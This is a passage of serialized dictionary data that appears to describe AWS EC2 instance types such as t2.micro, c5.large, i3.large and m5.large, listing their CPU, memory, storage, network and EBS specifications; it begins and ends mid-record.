'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't2.micro', 'CurrentGeneration': True, 'FreeTierEligible': True, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 1024}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.4, 'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 512, 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't2.nano', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.4}, 'VCpuInfo': {'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 512}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 2048, 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't2.small', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 2048}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 3840, 'TotalSizeInGB': 32, 'Disks': [{'SizeInGB': 16, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.large', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 3840}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 32, 'Disks': [{'SizeInGB': 16, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 3840, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 500, 'BaselineThroughputInMBps': 62.5, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 500, 'MaximumThroughputInMBps': 62.5, 'MaximumIops': 4000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 3840}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 500, 'BaselineThroughputInMBps': 62.5, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 500, 'MaximumThroughputInMBps': 62.5, 'MaximumIops': 4000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 4096, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 4096, 'TotalSizeInGB': 50, 'Disks': [{'SizeInGB': 50, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 50, 'Disks': [{'SizeInGB': 50, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 15616, 'TotalSizeInGB': 475, 'Disks': [{'SizeInGB': 475, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 425, 'BaselineThroughputInMBps': 53.125, 'BaselineIops': 3000, 'MaximumBandwidthInMbps': 425, 'MaximumThroughputInMBps': 53.125, 'MaximumIops': 3000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'i3.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 15616}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 475, 'Disks': [{'SizeInGB': 475, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 425, 'BaselineThroughputInMBps': 53.125, 'BaselineIops': 3000, 'MaximumBandwidthInMbps': 425, 'MaximumThroughputInMBps': 53.125, 'MaximumIops': 3000}, 'NvmeSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1], 'SizeInMiB': 7680, 'TotalSizeInGB': 32, 'Disks': [{'SizeInGB': 32, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 'm3.large', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm', 'paravirtual'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 7680}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 32, 'Disks': [{'SizeInGB': 32, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.4, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 450, 'BaselineThroughputInMBps': 56.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 450, 'MaximumThroughputInMBps': 56.25, 'MaximumIops': 3600}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm4.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.4}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 450, 'BaselineThroughputInMBps': 56.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 450, 'MaximumThroughputInMBps': 56.25, 'MaximumIops': 3600}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 